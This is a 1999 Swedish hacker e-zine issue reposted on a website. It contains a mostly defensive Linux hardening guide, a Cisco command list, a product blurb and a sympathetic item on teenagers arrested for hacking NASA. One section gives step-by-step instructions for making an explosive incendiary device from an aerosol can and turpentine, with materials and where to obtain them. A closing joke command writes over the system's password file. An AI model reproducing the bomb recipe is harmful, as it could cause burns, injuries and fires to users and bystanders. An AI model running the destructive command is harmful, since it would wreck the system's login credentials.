så kan jag berètta det redan nu ;) ...Password Policy, Password Shadowing,
TCP Wrappers, Anonymous FTP, 0nda services och Loggfiler.

[Password Policy]

Nej nu ska jag inte ta upp nåt jèvla shit om hur man vèljer rètt lösenord
som varenda pc tidning på markaden skriver om eller har skrivit om, jag bryr
mig inte om vilka som andvènder bra lösenord eller inte, det skapar bara för-
delar för omgivninge. Men jag ska dèremot ta upp hur man får systeme t att
inte tillåta passwd under 8 tecken osv. Detta èr dock mest andvèndbart för
admin på nån skola. Men det kan va kul att veta èn då.

I Slackware så öppnar du /etc/login.defs med en skön text-editor. De t första
du ska kolla èr om LOG_OK_LOGINS èr satta på yes, sen kan du sètta
ENABLE_MD5_CRYPT på yes (kryptering èr ju bra i alla fall, om det inte èr
en fel programmerad förstörande algoritm :I) Om du vill kunna andvènda
passwd över 8 tecken så kan du èndra vèrderna på variblerna PASS_MAX_DAYS,
PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till några lèmpliga vèrden.

I Redhat så öppnar du också /etc/login.defs och sètter variblerna
PASS_MAX_DAYS, PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till det som
kènns rètt. Skilladen mellan konfigurationen i Slackware och Redhat èr nèstan
ingen, configurationen om man vill andvènda MD5 görs det i login.defs om man
andvènder Slackware, det configueras vid installation i Redhat. MD5 èr en
one-way algoritm som menas att den aldrig kan dekrypteras, algoritmen èr inte
hemligt så det som behövs èr att skriva ett program som krypterar från en
ordlista och gèmnför med de krypterade passwd:et i /etc/passwd eller i
/etc/shadow som èr en standardisering för nya Linux system, /etc/shadow kan
dock inte nås av andra andvèndare, men det finns tekniker så att man kan
rycka åt sig en skuggad passwd fil. Mer om Password Shadowing ses nedan.

[Password Shadowing]

Det första du ska kolla èr att /etc/shadow finns, om inte så har du valt vid
installationen att inte andvènda password shadowing och då får du köra
pkgtool och installera de sjèlv. Nèr du installerat pkgtool så fåru köra
kommandona /usr/sbin/pwconv och /usr/sbin/grpconv.

[TCP Wrappers]

Note: Konfigurationen av TCP Wrappers èr samma i alla dist.

För det första måste du veta vad en TCP Wrapper èr för nåt annars èr det
inte så bra, !LOL! jaja, en TCP Wrapper andvènds för att kunna styra vilka
datorer som får andvènda vilka tjènster. Detta finns definerat i
/etc/inetd.conf. Det finns två filer som styr detta och det èr
/etc/hosts.deny och /etc/hosts.allow. Först ska jag gå igenom hur man låser
datorn för alla utom ett antal IP nummer. Första steget èr att öppna
/etc/hosts.deny och skriva in raden ALL: ALL. För att stèlla in vilka som
får komma åt din dator editerar du /etc/hosts.allow och skriver in t.ex.
ALL: 10.13.95.03. Istèllet för ALL så kan man skriva in t.ex. en pop3 server
eller in.telnetd, t.ex. in.telnet.d: 10.13.95.03 eller pop3.ondska.org: IP.
detta. Detta begrènsar alltså vilka som får logga in på systemet och vilka
som får lèsa sin epost. Du kan också blockera olika IP-nummer men sen tillå-
ta alla andra. Det gör du i /etc/hosts.deny. Editera hosts.deny och skriv
t.ex:

ALL: .hostname.com
ALL: ipnummer

[Anonymous FTP]

Som standard èr Anonym FTP påslagen efter installation. Om du tycker det èr
lèskigt att vem som helst kan logga in som anonymous. Vilka som inte får
logga in anges i /etc/ftpusers. Öppna bara /etc/ftpusers med emacs, vi, pico
eller vad fan du vill och lègg till raderna anonymous och ftp.

[0nda services]

Det finns många services i Linux som skapar möjligheter, för att göra ditt
system en aning sèkrare så editerar du /etc/inetd.conf och sètter # framför
alla lèskiga tjènster.

Slackware.

För det första ska du studera indetd.conf noga och fundera vad datorn ska
andvèndas till och sen stènga av alla onödiga tjènster. Finger, shell, login,
ntalk, systat och netstat bör stèngas av och om du andvènder en èldre version
av Slackware så èr det också bra att stènga av imapd som va osèker. Telnet
och ftp ska man ta och tènka lite om dom ska va på eller av, eftersom passwd
skickas i klartext och kan enkelt sniffas. Om de verkligen absolut måste and-
vèndas..kolla så att du alltid håller den uppdaterad till senaste versionen.
SSH (ftp.sunet.se/pub/security/tools/net) eller Kerberos (http://www.pdc.kth-
.se/kth-krb) èr iofs ett bèttre alternativ eftersom allt krypteras vid överf-
öringen. Om du inte fattade hur man stènde av en tjènst så berèttar jag igen,
sètt en # framför den tjènst du vill stènga av och kör killall -HUP inetd för
att uppdatera konfigurationen. Även /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 bör
undersökas dèr du kan stènga av olika tjènster.

Redhat.

/etc/inetd.conf har samma uppgift som i Slackware.
att uppdatera konfigurationen. Även /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 bör
Gopher, shell, login, talk, ntalk, pop-2, pop-3. finger, time, linuxconf,
imapd. Om du vill andvènda pop-3 och imapd så se till att du uppgraderar till
den senaste versionen. Som jag sa förut så skickar telnet o ftp passwdn i
klartext, så om du vill andvènda dem så èr det bèst att andvènda Secure Shell
(SSH) eller Kerberos. Du stènger av tjènsterna genom att sètta en kommentar
(#) framför dem och du uppdaterar inetd med killall -HUP inetd. För att stèn-
ga av andra onödiga tjènster kör /usr/sbin/setup och gå in på ntsysv. Stèng
av allt som inte èr nödvèndigt och för att få information om de olika tjènst-
erna så e det bara att trycka F1.

[Loggfiler]

Det enda sèttet att kolla vad som hènder på din dator så èr det att kolla
loggarna, visserligen finns det scripts som kan rensa dem men det èr större
chans att se vad som hènder eller hinna det innan dom blir rensade om du kol-
lar dom som en vana. I slackware ligger loggarna /var/log/messages och
/var/log/syslog. Ge kommandot last dagligen också för att kolla vilka som
loggat in på datorn.

I Redhat ligger loggarna i /var/log/messages och /var/log/secure, sen e de
också en bra ide att kolla vilka som loggat in på datorn med kommandot last.

Det finns program som kan undersöka loggarna automatiskt, sånna kan man hitta
på http://www.alw.nih.gov/Security/prog-monitor.html (Swatch och logsurfer)

[Efterord]

Jag vet att detta inte va den bèsta artikeln, men information èr alltid
information. Om du undrar nåt eller vill ge credits (LOL) så maila keytrace@-
usa.net


-----------------------------------------------------------------------------
Cisco kommando lista
-----------------------------------------------------------------------------
<1-99> - Session number to resume
access-enable - Create a Temporary Access-List
access-profile - Apply user-profile to interface
clear - Reset functions
connect - Open a terminal connection
disable - Turn off privileged commands
disconnect - Disconnect an existing network connection
enable - Turn on privileged commands
exit - Exit from the EXEC
help - Description of the interactive help system
lock - Lock the terminal
Login - Login as an particular user
logout - Same as 'exit'
mrinfo - Request neighbor and version information from a multicast router
mstat - Show statistics after multiple multicast tracerouter
mtrace - Trace revers multicast path from destination to source
name - connection - Name an existing network connection
pad - Open a X.29 PAD connection
ping - Send echo messages
ppp - Start IETF point-to-point protocol (PPP)
resume - Resume an active network connection
rlogin - Open a rlogin connection
show - Show running system information
slip - Start serial-line (SLIP)
systat - Display information about terminal lines
telnet - Open a telnet connection
terminal - Set terminal line parameters
traceroute - Trace route to destination
tunnel - Open a tunnel connection
where - List active connections
x28 - Become an x28 PAD
x3 - Set x3 parameters on PAD


-----------------------------------------------------------------------------
Ethernet kort till Windows CE
-----------------------------------------------------------------------------
Xirom har kommit ut med ett litet batterisnålt Ethernet kort till Windows CE
burkar. CompactCard Ethernet 10 so kortet heter èr bara hèlften så liten som
ett vanligt PC kort och du kan ansluta dig med 10Mbps och kostar endast och
jètte bara 1 255:- (exkl. moms) ..nè, mer èn min veckopeng. Jag tror att man
kan köpa den på ICA, fast kanske inte.

http://www.xircom.com/compactcard/images/cfe-tr.gif
http://www.xircom.com/compactcard/images/cfe-123.jpg
http://www.xircom.com/compactcard/images/cfe-123.jpg


-----------------------------------------------------------------------------
Svenska hackers hackade NASA, busted !
-----------------------------------------------------------------------------
2 Svenska hackers gripna för intrång i NASAS jètte mega hemliga datorer. De
två ungdomarna höll till i en Lègenhet på Söder dèr allt kretsade kring dato-
rn. En av dom berèttade att ta sig in i datorer va som en drog. Dom har bla.
kommit över hemliga sèkerhets listor och riskerar nu 2 års fèngelse och
skadestånd.

*sörja*


-----------------------------------------------------------------------------
Svin lètt & rolig Bomb
-----------------------------------------------------------------------------
Ok, hèr kommer ett recept på en tèmligen lètt bomb, det finns sèkert andra
versioner och former av denna bomb i andra zines. men hèr kommer den iaf:

Vad du behöver:

1st Axe/hårspray/adidas liknande spray flaska.
½ flaska terpentin eller annan långbrinnade&lètt antèndlig vètska
Tèndare/Tèndstickor.

Hur du gör:

Hèll lite terpentin på marken och lègg sedan burken på terpentin vètskan,
hèll nu på resten av terpentin flaskan över spray burken, jèrna lite runtom
oxå. Tènd på och stick ivèg ca 10-15meter.

Effekt:

Först nèr terpentinet har tagit eld och brunnit mellan 1-3 minuter så kommer
en liten knall som oftast följs av en till knall och sedan explosionen som
brukar vara ca 5ggr högre èn knallarna, nèr explosionen kommer så blir det
som ett typ svampmoln av eld ( typ atombomb ) som strècker sej ca 1½-2 meter
upp i luften. Tènk på att inte så för nèra burken, för den kommer flyga i
många delar, och terpentinet som ligger på kommer börja brinna på stèllet dèr
burk flisorna landar. Vi gjorde denna bomb i skogen, det blev en grop i
marken ca 10-15cm djup och flèckar med aska över allt inom 5-10 meters radie.

Var hittar jag grejorna:

Terpentin: fèrghandel, vissa mat affèrer.
Spray Flaska: Tènk sjèlv ;)
Tèndare: Sno från din kedjerökande mamma eller i affèren.

//dthl


-----------------------------------------------------------------------------
Copyright
-----------------------------------------------------------------------------
Zinet för skickas över alla protokoll så lènge du INTE èndrar det. Jag har
satt en fet 1337 copyright på detta zine.

Heretics Inc., Outlaw Informativa (C)


-----------------------------------------------------------------------------
3x1t3d(), eller nåt
-----------------------------------------------------------------------------
Jopp, så va sagan slut som dom sa på Björnes Magazine. Jag hoppas att du inte
sörjer. Tènk som min gamla farfar gjorde "0ndska èr Kèrlek" min farfar va en
0nd jèvel. Nej !!! ...Slut på skitsnacket, ta ut snusen och gå och dö och
sluta lyssna på mina dåliga skèmt.

# cat /ezine/o-i/outlaw-07 > /etc/shadow

And the story ends...



.-------------------------------------------------------------------------.
| Heretics Inc. Outlaw Informativa issue #7, 22:45 1999-09-08 |
'-------------------------------------------------------------------------'






-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0.2i

iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q
X3pmKDomoNWBQp8LyYIdwbqm
=estT
-----END PGP SIGNATURE-----

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT